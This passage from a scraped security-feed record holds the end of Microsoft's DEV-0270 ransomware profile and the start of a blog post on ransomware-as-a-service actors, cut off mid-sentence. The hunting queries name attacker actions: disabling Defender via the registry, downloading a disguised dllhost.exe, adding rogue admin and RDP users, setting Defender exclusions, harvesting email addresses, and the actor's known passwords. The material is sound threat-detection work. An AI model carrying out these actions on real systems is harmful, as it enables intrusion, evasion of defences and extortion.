various stages of their attack. This query locates PowerShell activity tied to the actor:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270PowershellSep2022.yaml>\n\n**DEV-0270 WMIC discovery**\n\nThis query identifies _dllhost.exe_ using WMIC to discover additional hosts and associated domains in the environment:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270WMICDiscoverySep2022.yaml>\n\n**DEV-0270 new user creation**\n\nThis query tries to detect creation of a new user using a known DEV-0270 username/password schema:\n\n * <https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Dev-0270NewUserSep2022.yaml>\n\n### Microsoft 365 Defender\n\nTo locate possible actor activity, run the following queries.\n\n**Disable services via registry** \nSearch for processes modifying the registry to disable security features. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Disabling%20Services%20via%20Registry.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all(@\u2019\u201dreg\u201d\u2019, \u2018add\u2019, @\u2019\u201dHKLM\\SOFTWARE\\Policies\\\u2019, \u2018/v\u2019,\u2019/t\u2019, \u2018REG_DWORD\u2019, \u2018/d\u2019, \u2018/f\u2019)\n and InitiatingProcessCommandLine has_any(\u2018DisableRealtimeMonitoring\u2019, \u2018UseTPMKey\u2019, \u2018UseTPMKeyPIN\u2019, \u2018UseAdvancedStartup\u2019, \u2018EnableBDEWithNoTPM\u2019, \u2018RecoveryKeyMessageSource\u2019)\n\n**Modifying the registry to add a ransom message notification**\n\nIdentify registry modifications that are indicative of a ransom note tied to DEV-0270. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Modifying%20the%20registry%20to%20add%20a%20ransom%20message%20notification.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all(\u2018\u201dreg\u201d\u2019, \u2018add\u2019, @\u2019\u201dHKLM\\SOFTWARE\\Policies\\\u2019, \u2018/v\u2019,\u2019/t\u2019, \u2018REG_DWORD\u2019, \u2018/d\u2019, \u2018/f\u2019, \u2018RecoveryKeyMessage\u2019, \u2018Your drives are Encrypted!\u2019, \u2018@\u2019)\n\n**DLLHost.exe file creation via PowerShell**\n\nIdentify masqueraded _DLLHost.exe_ file created by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20file%20creation%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \u2018powershell.exe\u2019\n | where InitiatingProcessCommandLine has_all(\u2018$file=\u2019, \u2018dllhost.exe\u2019, \u2018Invoke-WebRequest\u2019, \u2018-OutFile\u2019)\n\n**Add malicious user to Admins and RDP users group via PowerShell**\n\nLook for adding a user to Administrators in remote desktop users via PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Add%20malicious%20user%20to%20Admins%20and%20RDP%20users%20group%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ 'powershell.exe'\n | where InitiatingProcessCommandLine has_all('$admins=', 'System.Security.Principal.SecurityIdentifier', 'Translate', '-split', 'localgroup', '/add', '$rdp=')\n\n**Email data exfiltration via PowerShell**\n\nIdentify email exfiltration conducted by PowerShell. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ 'powershell.exe'\n | where ProcessCommandLine has_all('Add-PSSnapin', 'Get-Recipient', '-ExpandProperty', 'EmailAddresses', 'SmtpAddress', '-hidetableheaders')\n\n**Create new user with known DEV-0270 username/password** \nSearch for the creation of a new user using a known DEV-0270 username/password schema. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Create%20new%20user%20with%20known%20DEV-0270%20username%20and%20password.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_all('net user', '/add')\n | parse InitiatingProcessCommandLine with * \"user \" username \" \"*\n | extend password = extract(@\"\\buser\\s+[^\\s]+\\s+([^\\s]+)\", 1, InitiatingProcessCommandLine)\n | where username in('DefaultAccount') or password in('P@ssw0rd1234', '_AS_@1394')\n\n**PowerShell adding exclusion path for Microsoft Defender of ProgramData**\n\nIdentify PowerShell creating an exclusion path of ProgramData directory for Microsoft Defender to not monitor. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/PowerShell%20adding%20exclusion%20path%20for%20Microsoft%20Defender%20of%20ProgramData.yaml>)\n \n \n DeviceProcessEvents\n | where FileName =~ \"powershell.exe\" and ProcessCommandLine has_all(\"try\", \"Add-MpPreference\", \"-ExclusionPath\", \"ProgramData\", \"catch\")\n \n\n**DLLHost.exe WMIC domain discovery**\n\nIdentify dllhost.exe using WMIC to discover additional hosts and associated domain. [GitHub link](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/DLLHost.exe%20WMIC%20domain%20discovery.yaml>)\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"dllhost.exe\" and InitiatingProcessCommandLine == \"dllhost.exe\"\n | where ProcessCommandLine has \"wmic computersystem get domain\"\n \n\nThe post [Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations](<https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-07T21:00:00", "type": "mmpc", "title": "Profiling DEV-0270: PHOSPHORUS\u2019 ransomware operations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-44228"], "modified": "2022-09-07T21:00:00", "id": "MMPC:1E3441B57C08BC18202B9FE758C2CA71", "href": "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T16:00:24", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on 